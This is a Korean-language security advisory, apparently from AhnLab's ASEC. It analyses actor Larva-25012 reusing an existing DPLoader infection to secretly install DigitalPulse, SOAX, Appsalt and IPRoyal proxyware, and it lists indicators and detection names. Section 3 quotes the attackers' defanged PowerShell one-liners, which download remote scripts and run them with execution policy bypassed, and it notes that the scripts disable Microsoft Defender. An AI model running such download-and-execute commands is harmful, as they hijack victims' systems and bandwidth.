Larva-25012 공격자의 2026년 Proxyware 유포 사례 (DigitalPulse, SOAX, Appsalt, IPRoyal)
AhnLab SEcurity intelligence Center(ASEC)은 Proxyjacking 공격을 모니터링하고 있으며 2026년 하반기에 Larva-25012 공격자가 다시 Proxyware를 활발하게 유포 중인 것을 확인하였다. 공격자는 새로운 방식으로 악성코드 유포하기보다는 이미 감염된 시스템을 대상으로 Proxyware를 유포한 것으로 보인다.
1. Proxyjacking 공격
Proxyjacking 공격이란 사용자의 동의 없이 Proxyware를 설치하여 감염 시스템의 인터넷 대역폭 일부를 외부에 공유하는 방식으로 공격자들이 수익을 얻는 공격 방식이다. Proxyware란 설치된 시스템에서 현재 사용 가능한 인터넷 대역폭 일부를 외부에 공유하는 프로그램으로서 일반적으로 이를 설치하는 사용자는 대역폭을 제공하는 대신 일정한 금액을 받는다. 만약 공격자가 사용자의 동의 없이 감염 시스템에 Proxyware를 몰래 설치할 경우 감염된 시스템은 비자발적으로 네트워크 대역폭을 탈취당하게 되며 수익은 공격자에게 돌아가게 된다. 이는 Cryptojacking 공격과 유사한데 Proxyware 대신 코인 마이너를 설치하여 감염 시스템의 자원으로 암호 화폐를 채굴하는 것이 차이점이다.
2. 과거 공격 사례
Larva-25012 공격자는 적어도 2025년부터 2026년 초까지 다수의 시스템들을 대상으로 Proxyware를 유포하였다. 공격자는 주로 다양한 유튜브 무료 다운로드 사이트에서 팝업 되는 광고를 통해 유포하였으며 [1] [2] [3] 이외에도 Steam 클라이언트 정리 툴을 위장하는 방식으로 깃허브를 활용하기도 하였다. [4] 2026년 초에는 크랙과 같은 불법 소프트웨어 다운로드 페이지에서 Proxyware가 유포된 사례가 확인되기도 하였다.
공격자는 최근 다시 다시 활발하게 Proxyware를 유포하고 있는데 이는 이미 설치된 DPLoader를 활용한 것으로 보인다. DPLoader는 JavaScript 버전과 파이썬 버전이 존재하는데 대부분 JavaScript 버전이 공격에 사용되었다. 최초 유포 악성코드는 파이썬 명령을 통해 NodeJS를 설치하고 작업 스케줄러에 등록해 난독화된 JavaScript 즉 DPLoader를 지속적으로 실행되도록 하였다. DPLoader는 시스템의 기본적인 정보를 수집해 C&C 서버에 주기적으로 전송하며 C&C 서버의 응답에 따라 파워쉘 명령을 실행할 수 있다. 다운로드된 파워쉘 명령들은 모두 Proxyware를 설치하는 유형이었다.
공격자가 유포한 Proxyware들로는 DigitalPulse, Honeygain, Infatica가 있는데 DigitalPulse는 탐지를 우회하기 위해 난독화하거나 탐색기 프로세스에 인젝션하는 기법을 사용하기도 하였다. 이외에도 SDK 형태로 제공되는 Proxyware들을 악용하기 위해 로더 악성코드와 함께 설치해 공격자의 API를 전달하는 방식이 사용되기도 한다.
3. 최신 공격 사례
3.1. DigitalPulse
공격자는 이미 설치된 DPLoader를 악용한 것으로 보이며 JS 버전의 DPLoader를 통해 DigitalPulse Proxyware가 설치되었다.

Figure 1. DPLoader를 통해 설치된 Proxyware
공격 사례에서는 다음과 같은 명령들이 확인되며 이를 통해 다운로드된 파워쉘 스크립트가 Proxyware를 설치한다.
> cmd.exe /d /s /c “powershell.exe -ExecutionPolicy Bypass -Command \”$scriptUrl = ‘hxxps://pub-43fc211373d547278dd3d5bd0b4d9dac.r2[.]dev/87648736456384.ps1’; $tempScriptPath = [System.IO.Path]::Combine($env:TEMP, ‘tmp.ps1’); …
> powershell.exe -ExecutionPolicy Bypass -Command “iwr -UseBasicParsing -Uri hxxps://pub-43fc211373d547278dd3d5bd0b4d9dac.r2[.]dev/87648736456384.ps1 | iex”
파워쉘 스크립트는 다운로드한 Proxyware를 “PlutonAgentScheduler”라는 이름의 작업으로 등록하며 이외에도 마이크로소프트 디펜더를 비활성화하는 명령도 실행한다.

Figure 2. 다운로더 파워쉘
최종적으로 “PlutonAgent.exe”라는 이름으로 설치되는 Proxyware는 과거 사례와 동일하게 DigitalPulse Proxyware이다.
- DigitalPulse Proxyware 설치 경로 : %SystemRoot%\pluton\<Random>\plutonagent.exe
3.2. SOAX
SOAX Proxyware도 DigitalPulse와 유사한 파워쉘 스크립트를 통해 설치된다.
> powershell.exe -ExecutionPolicy Bypass -Command “iwr -UseBasicParsing -Uri hxxps://dhrciu5akloar.cloudfront[.]net/63563545600333.ps1 | iex”
파워쉘 스크립트는 “EnterpriseMgmtServicesScheduler”라는 이름의 작업에 등록하며 실행 결과나 에러 리포트를 다음 주소로 보고하는 것이 특징이다.
- C&C 서버 주소 : hxxps://7jb7qi6vnr5pa22a4br4irz3tu0yqzbd.lambda-url.us-east-1.on[.]aws/e
-

Figure 3. C&C 서버에 보고하는 루틴
Proxyware는 로더와 SOAX SDK DLL 파일이 함께 유포되는데 로더는 동일 경로에 위치한 SDK DLL을 로드하고 liblivenet_init() 호출 시 공격자의 토큰을 인자로 전달한다.

Figure 4. SOAX Proxyware 로더
- SOAX 로더 설치 경로 – 1 : %ProgramFiles%\deephour\deephour.exe
- SOAX 로더 설치 경로 – 2 : %ProgramFiles%\microsoft\copilot\services\copilotservice.exe
- SOAX Proxyware 설치 경로 – 1 : %ProgramFiles%\deephour\libkldemtk_amd64.dll
- SOAX Proxyware 설치 경로 – 2 : %ProgramFiles%\microsoft\copilot\services\liblivenet_amd64.dll
3.3. Appsalt
또 다른 사례에서는 Appsalt Proxyware도 확인된다. Appsalt를 설치하는 파워쉘 스크립트는 기능상 SOAX Proxyware 사례와 실질적으로 동일하며 작업 스케줄러 이름은 “SecurityHealthServiceSyncUpdate”이다.
> powershell.exe -ExecutionPolicy Bypass -Command “iwr -UseBasicParsing -Uri hxxps://d6nue5fz4t6y8.cloudfront[.]net/9083743654554665.ps1 | iex”
Appsalt Proxyware 또한 SDK DLL과 이를 실행하는 로더가 함께 설치되며 로더는 다음과 같이 appsalt_init() 함수를 호출하면서 인자로 공격자의 토큰을 전달한다.

Figure 5. Appsalt Proxyware 로더
- Appsalt 로더 설치 경로 : %ProgramFiles%\microsoft\servicing\securityhealthservicesyncupdate.exe
- Appsalt Proxyware 설치 경로 : %ProgramFiles%\microsoft\servicing\appsalt.dll
3.4. IPRoyal
공격자는 가장 최근 기준 IPRoyal Proxyware를 설치하고 있다. 작업 스케줄러의 이름이 “BackgroundTaskRegistrationMaintenanceTaskScheduler”인 것을 제외하면 다른 기능은 동일하다.
> powershell.exe -ExecutionPolicy Bypass -Command “iwr -UseBasicParsing -Uri hxxps://dci6j1p0q6khn.cloudfront[.]net/784365567456345.ps1 | iex”

Figure 6. IPRoyal 로더
- IPRoyal 로더 설치 경로 : %ProgramFiles%\Microsoft\TaskRegistrationMaintenanceTask\TaskRegistrationMaintenance.exe
- IPRoyal Proxyware 설치 경로 : %ProgramFiles%\Microsoft\TaskRegistrationMaintenanceTask\pawns-sdk.dll
4. 결론
Larva-25012 공격자는 유튜브 동영상 다운로드 페이지나 오픈 소스 도구 그리고 불법 소프트웨어 크랙 다운로드 페이지를 위장해 Proxyware를 유포하였다. 최근에는 이미 감염 시스템에 설치된 DPLoader를 활용해 다시 Proxyware를 활발하게 유포 중인 것으로 추정된다. Proxyware 악성코드는 시스템의 리소스를 이용해 수익을 얻는다는 점에서 코인 마이너와 유사하며 최근에는 국내 다수의 시스템들이 공격 대상이 되고 있다.
사용자는 공식 홈페이지가 아닌 광고 및 팝업과 같은 의심스러운 웹 사이트나 자료 공유 사이트에서 실행 파일을 설치하는 행위를 주의해야 한다. 또한 이미 감염된 시스템의 경우 V3 제품을 설치하여 추가적인 악성코드 감염을 막아야 한다.
[V3 진단명]
- Downloader/Powershell.Proxyware.SC316575 (2026.09.12.00)
- Downloader/Powershell.Proxyware.SC316650 (2026.09.19.00)
- Trojan/Win.Loader.C5946067 (2026.09.18.00)
- Trojan/Win.Loader.C5946330 (2026.09.18.03)
- Trojan/Win.Loader.C5948027 (2026.09.22.02)
- Unwanted/Win.Proxyware.C5946331 (2026.09.12.00)
- Unwanted/Win.Proxyware.C5943232 (2026.09.12.00)
- Unwanted/Win.Proxyware.C5943233 (2026.09.12.00)
- Unwanted/Win.Proxyware.C5946068 (2026.09.18.00)
- Unwanted/Win.Proxyware.C5946328 (2026.09.18.03)
- Unwanted/Win.Proxyware.C5948028 (2026.09.22.02)